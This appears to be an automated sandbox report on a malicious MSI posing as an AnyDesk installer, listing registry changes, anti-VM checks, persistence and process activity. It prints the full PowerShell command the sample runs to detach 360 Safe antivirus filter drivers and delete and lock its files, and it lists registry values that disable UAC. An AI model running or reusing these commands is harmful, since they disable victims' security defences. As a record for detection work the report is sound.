25b7267bd776447563554f6e98e4bac1944a3f800c1658231df71293d0dfb07e

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	iusb3mon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
556	powershell.exe
1696	powershell.exe
2584	powershell.exe
2032	powershell.exe
2152	powershell.exe
1060	powershell.exe
2268	powershell.exe
744	powershell.exe
1704	powershell.exe
1452	powershell.exe
1980	powershell.exe
2648	powershell.exe
2804	powershell.exe
1076	powershell.exe
1740	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iusb3mon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iusb3mon.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine	iusb3mon.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2228	iusb3mon.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIE2B1.tmp	msiexec.exe
File created	C:\Windows\Installer\f76e264.ipi	msiexec.exe
File created	C:\Windows\Installer\f76e266.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFBC1.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File created	C:\Windows\Installer\f76e263.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76e263.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB60.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f76e264.ipi	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
1704	un.exe
2228	iusb3mon.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2584	powershell.exe
1704	powershell.exe
1452	powershell.exe
1980	powershell.exe
2032	powershell.exe
2152	powershell.exe
1060	powershell.exe

Loads dropped DLL 7 IoCs

pid	Process
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
2500	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iusb3mon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fltMC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	iusb3mon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	iusb3mon.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2684	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
1980	powershell.exe
2032	powershell.exe
2152	powershell.exe
1060	powershell.exe
2584	powershell.exe
2596	msiexec.exe
2596	msiexec.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
744	powershell.exe
2268	powershell.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
1696	powershell.exe
556	powershell.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe
2228	iusb3mon.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2500	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2500	msiexec.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe
Token: SeSecurityPrivilege	2596	msiexec.exe
Token: SeCreateTokenPrivilege	2500	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2500	msiexec.exe
Token: SeLockMemoryPrivilege	2500	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2500	msiexec.exe
Token: SeMachineAccountPrivilege	2500	msiexec.exe
Token: SeTcbPrivilege	2500	msiexec.exe
Token: SeSecurityPrivilege	2500	msiexec.exe
Token: SeTakeOwnershipPrivilege	2500	msiexec.exe
Token: SeLoadDriverPrivilege	2500	msiexec.exe
Token: SeSystemProfilePrivilege	2500	msiexec.exe
Token: SeSystemtimePrivilege	2500	msiexec.exe
Token: SeProfSingleProcessPrivilege	2500	msiexec.exe
Token: SeIncBasePriorityPrivilege	2500	msiexec.exe
Token: SeCreatePagefilePrivilege	2500	msiexec.exe
Token: SeCreatePermanentPrivilege	2500	msiexec.exe
Token: SeBackupPrivilege	2500	msiexec.exe
Token: SeRestorePrivilege	2500	msiexec.exe
Token: SeShutdownPrivilege	2500	msiexec.exe
Token: SeDebugPrivilege	2500	msiexec.exe
Token: SeAuditPrivilege	2500	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2500	msiexec.exe
Token: SeChangeNotifyPrivilege	2500	msiexec.exe
Token: SeRemoteShutdownPrivilege	2500	msiexec.exe
Token: SeUndockPrivilege	2500	msiexec.exe
Token: SeSyncAgentPrivilege	2500	msiexec.exe
Token: SeEnableDelegationPrivilege	2500	msiexec.exe
Token: SeManageVolumePrivilege	2500	msiexec.exe
Token: SeImpersonatePrivilege	2500	msiexec.exe
Token: SeCreateGlobalPrivilege	2500	msiexec.exe
Token: SeBackupPrivilege	2420	vssvc.exe
Token: SeRestorePrivilege	2420	vssvc.exe
Token: SeAuditPrivilege	2420	vssvc.exe
Token: SeBackupPrivilege	2596	msiexec.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2872	DrvInst.exe
Token: SeLoadDriverPrivilege	2872	DrvInst.exe
Token: SeLoadDriverPrivilege	2872	DrvInst.exe
Token: SeLoadDriverPrivilege	2872	DrvInst.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe
Token: SeRestorePrivilege	2596	msiexec.exe
Token: SeTakeOwnershipPrivilege	2596	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2500	msiexec.exe
2500	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2676	MsiExec.exe
2676	MsiExec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2596 wrote to memory of 2676	2596	msiexec.exe	35
PID 2676 wrote to memory of 2492	2676	MsiExec.exe	36
PID 2676 wrote to memory of 2492	2676	MsiExec.exe	36
PID 2676 wrote to memory of 2492	2676	MsiExec.exe	36
PID 2676 wrote to memory of 2492	2676	MsiExec.exe	36
PID 2492 wrote to memory of 1912	2492	cmd.exe	38
PID 2492 wrote to memory of 1912	2492	cmd.exe	38
PID 2492 wrote to memory of 1912	2492	cmd.exe	38
PID 2492 wrote to memory of 1912	2492	cmd.exe	38
PID 2676 wrote to memory of 1980	2676	MsiExec.exe	39
PID 2676 wrote to memory of 1980	2676	MsiExec.exe	39
PID 2676 wrote to memory of 1980	2676	MsiExec.exe	39
PID 2676 wrote to memory of 1980	2676	MsiExec.exe	39
PID 2676 wrote to memory of 2032	2676	MsiExec.exe	41
PID 2676 wrote to memory of 2032	2676	MsiExec.exe	41
PID 2676 wrote to memory of 2032	2676	MsiExec.exe	41
PID 2676 wrote to memory of 2032	2676	MsiExec.exe	41
PID 2676 wrote to memory of 2152	2676	MsiExec.exe	43
PID 2676 wrote to memory of 2152	2676	MsiExec.exe	43
PID 2676 wrote to memory of 2152	2676	MsiExec.exe	43
PID 2676 wrote to memory of 2152	2676	MsiExec.exe	43
PID 2676 wrote to memory of 1060	2676	MsiExec.exe	45
PID 2676 wrote to memory of 1060	2676	MsiExec.exe	45
PID 2676 wrote to memory of 1060	2676	MsiExec.exe	45
PID 2676 wrote to memory of 1060	2676	MsiExec.exe	45
PID 2676 wrote to memory of 2584	2676	MsiExec.exe	47
PID 2676 wrote to memory of 2584	2676	MsiExec.exe	47
PID 2676 wrote to memory of 2584	2676	MsiExec.exe	47
PID 2676 wrote to memory of 2584	2676	MsiExec.exe	47
PID 2676 wrote to memory of 1704	2676	MsiExec.exe	49
PID 2676 wrote to memory of 1704	2676	MsiExec.exe	49
PID 2676 wrote to memory of 1704	2676	MsiExec.exe	49
PID 2676 wrote to memory of 1704	2676	MsiExec.exe	49
PID 2676 wrote to memory of 2228	2676	MsiExec.exe	51
PID 2676 wrote to memory of 2228	2676	MsiExec.exe	51
PID 2676 wrote to memory of 2228	2676	MsiExec.exe	51
PID 2676 wrote to memory of 2228	2676	MsiExec.exe	51
PID 2228 wrote to memory of 2268	2228	iusb3mon.exe	52
PID 2228 wrote to memory of 2268	2228	iusb3mon.exe	52
PID 2228 wrote to memory of 2268	2228	iusb3mon.exe	52
PID 2228 wrote to memory of 2268	2228	iusb3mon.exe	52
PID 2228 wrote to memory of 1696	2228	iusb3mon.exe	53
PID 2228 wrote to memory of 1696	2228	iusb3mon.exe	53
PID 2228 wrote to memory of 1696	2228	iusb3mon.exe	53
PID 2228 wrote to memory of 1696	2228	iusb3mon.exe	53
PID 2228 wrote to memory of 556	2228	iusb3mon.exe	55
PID 2228 wrote to memory of 556	2228	iusb3mon.exe	55
PID 2228 wrote to memory of 556	2228	iusb3mon.exe	55
PID 2228 wrote to memory of 556	2228	iusb3mon.exe	55
PID 2228 wrote to memory of 744	2228	iusb3mon.exe	56
PID 2228 wrote to memory of 744	2228	iusb3mon.exe	56
PID 2228 wrote to memory of 744	2228	iusb3mon.exe	56
PID 2228 wrote to memory of 744	2228	iusb3mon.exe	56
PID 2228 wrote to memory of 2820	2228	iusb3mon.exe	60
PID 2228 wrote to memory of 2820	2228	iusb3mon.exe	60
PID 2228 wrote to memory of 2820	2228	iusb3mon.exe	60
PID 2228 wrote to memory of 2820	2228	iusb3mon.exe	60
PID 2268 wrote to memory of 2920	2268	powershell.exe	62

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Anydesk6.6.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2500

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C7C0E956F142523F516C32E0DCBA4DEC
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\SysWOW64\fltMC.exe
      fltmc.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:1912
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Hide Artifacts: Ignore Process Interrupts
    - System Location Discovery: System Language Discovery
